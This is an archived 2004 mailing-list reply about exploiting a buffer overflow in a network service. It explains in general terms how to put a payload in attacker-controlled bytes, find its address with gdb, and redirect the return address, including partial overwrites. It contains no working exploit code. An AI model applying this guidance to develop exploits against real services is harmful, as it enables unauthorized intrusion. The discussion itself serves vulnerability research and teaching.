Vulnerability Development mailing list archives
Re: Exploiting network services question
From: James Longstreet <jlongs2 () uic edu>
Date: Sat, 18 Dec 2004 20:56:44 -0600 (CST)
On Mon, 13 Dec 2004 just-a-nick () gmx net wrote:
I have a question regarding the exploitation of network services. If I send the following string to a service ["A"x78]["abcd"][junk - up to 430 bytes] I can control eip with "abcd". How can I exploit this? Is there a good tutorial that I should read? Unfortunately I did not find anything
usefull
with google...
I'm not sure I understand your question. Does the value you put in for eip have to be alphabetic, or is the "abcd" simply notation for "anything I want?" Both are exploitable -- at least theoretically. If the return address can be anything you want, and if that 430 bytes of junk is also controlled by you, put a payload there. Find out the address of that payload (hint: use gdb), and replace "abcd" with that address. If it has to be alphabetic, it still may be exploitable. The original return address is probably going to be something in the 0x08xxxxxx range, which is usually where code is. Since 0x08 isn't alphabetic, you can't overflow the whole address. But if you're precise, you can control 1, 2, or 3 bytes of it. See if there's a bit of code in the range that you can set it to that might be fun to execute.
Current thread:
- Exploiting network services question just-a-nick (Dec 13)
- <Possible follow-ups>
- Re: Exploiting network services question Vade 79 (Dec 13)
- Re: Exploiting network services question James Longstreet (Dec 21)
- Re: Exploiting network services question just-a-nick (Dec 23)
- Re: Exploiting network services question James Longstreet (Dec 27)